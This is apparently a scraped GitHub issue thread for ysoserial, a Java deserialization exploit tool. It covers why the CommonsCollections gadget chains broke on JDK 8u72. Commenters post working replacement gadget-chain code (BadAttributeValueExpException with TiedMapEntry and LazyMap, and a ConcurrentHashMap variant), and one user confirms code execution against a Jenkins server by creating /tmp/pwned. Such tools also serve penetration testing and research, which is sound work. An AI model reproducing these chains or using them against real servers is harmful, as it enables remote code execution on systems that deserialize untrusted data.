Comments (12)
Actually the same thing is happening with Oracle JDK 1.8.0_73.
Was AnnotationInvocationHandler changed in the JDK? If so, when?
It would be good to adjust AnnotationInvocationHandler used in the following payloads to work with the latest versions
- CommonsCollections1
- CommonsCollections3
- Spring1
from ysoserial.
I'll try to reproduce this when I have time. They may have done further gadget hardening that breaks these.
from ysoserial.
It does look like there were more significant changes made to AnnotationInvocationHandler
as part of 8u72 in 12/2015.
There's a good chance this was hardening against these sorts of attacks and it will probably require a more significant time investment to fix.
from ysoserial.
For the Commons Collection this should work:
Transformer transformerChain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
Map outerMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(outerMap, "foo");
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valfield = val.getClass().getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(val, entry);
String out = "/tmp/cc.ser";
ObjectOutputStream stream = new ObjectOutputStream(new FileOutputStream(out));
stream.writeObject(val);
stream.flush();
ObjectInputStream in = new ObjectInputStream(new FileInputStream(out));
in.readObject();
from ysoserial.
Seems to work for me. Although the Unit test doesn't pass for some reason. Submitted PR anyway:
#26
from ysoserial.
Looks like it does indeed work and it appears that the test failure is caused by a check for a null SecurityManager
in BadAttributeValueExpException.readObject(ObjectInputStream)
that fails due to the use of a SecurityManager
to detect Runtime.exec()
in the test scaffolding:
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
ObjectInputStream.GetField gf = ois.readFields();
Object valObj = gf.get("val", null);
if (valObj == null) {
val = null;
} else if (valObj instanceof String) {
val= valObj;
} else if (System.getSecurityManager() == null // <----------------------------- HERE
|| valObj instanceof Long
|| valObj instanceof Integer
|| valObj instanceof Float
|| valObj instanceof Double
|| valObj instanceof Byte
|| valObj instanceof Short
|| valObj instanceof Boolean) {
val = valObj.toString();
} else { // the serialized object is from a version without JDK-8019292 fix
val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
}
}
The observer effect strikes again.
Looks like we'll need to figure out a more robust way of detecting successful execution while testing this stuff and I'm definitely open to ideas.
from ysoserial.
I hava changed the environment to openjdk 1.7.0, but the error also occurs.
java version "1.7.0_91"
OpenJDK Runtime Environment (IcedTea 2.6.3) (7u91-2.6.3-1)
OpenJDK 64-Bit Server VM (build 24.91-b01, mixed mode)
from ysoserial.
@jasinner ask a stupid question, if you can't generate the jar package by mvn package
(due to ExecCheckingSecurityManager$ExecException
, the junit passes fail), how do you test your PR?
When I replay this experiment about jenkins, I get the same error in the server log.
How can I get this exploit pass? Wait the fix for that failure, or others? Can you give me some tips?
My experiment environment is linux, openjdk1.8.0_72, jenkins 1.637.
Thanks very much.
from ysoserial.
add -DskipTests
to your mvn clean package
if you're trying to build the jar regardless of the unit test results.
master
branch is not fully stable at the moment and we are working on getting things cleaned up.
from ysoserial.
👍 It works now! And I can see the exist of /tmp/pwned. Great job!
from ysoserial.
Closing this for now since this is a limitation in the gadget chain(s) outside our control that should be helped by things like #10 and #30.
from ysoserial.
Using a ConcurrentHashMap might be the saver solution ...
final Transformer transformerChain = new ChainedTransformer(
transformers);
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
ConcurrentHashMap map = new ConcurrentHashMap(1);
map.put("dummy1", "dummy1");
Field f = ConcurrentHashMap.class.getDeclaredField("table");
f.setAccessible(true);
Object[] array = (Object[]) f.get(map);
Object node = array[1];
Field keyField = node.getClass().getDeclaredField("key");
keyField.setAccessible(true);
keyField.set(node, entry);
String out = "/tmp/chm.ser";
ObjectOutputStream stream = new ObjectOutputStream(
new FileOutputStream(out));
stream.writeObject(map);
stream.flush();
ObjectInputStream in = new ObjectInputStream(new FileInputStream(out));
in.readObject();
from ysoserial.
Related Issues (20)
- Troubleshooting docs
- i can't found ysoserial.jar ! HOT 2
- ysoserial doesn't work with Java 18 HOT 1
- another way to Get PoC with RCE HOT 1
- Help understanding the CommonsBeanutils1 payload HOT 1
- Error while generating or serializing payload(openjdk17) HOT 1
- Ysoserial doesn't work with Java version 17 HOT 11
- Error: Unable to access jarfile ysoserial.jar HOT 6
- Error while generating or serializing payload (FIXED) HOT 2
- A tool for fuzzing the right payload HOT 3
- I don't know how to input next. HOT 2
- How can I create the sleep payload in the following payload with ysoserial? HOT 1
- Common Collection1 failed HOT 1
- Hello, I have some confusion about the code implementation of URLDNS HOT 2
- getting error while executing the command HOT 1
- ERROR when building → javax.interceptor depency no longer available at repo.jenkins-ci.org
- Ysoserial - System.IO.FileNotFoundException HOT 1
- parameter 'descriptor' has been removed from the plugin, please verify documentation.
- javax.interceptor-api/3.1 is no longer available HOT 1
- Build Failure HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from ysoserial.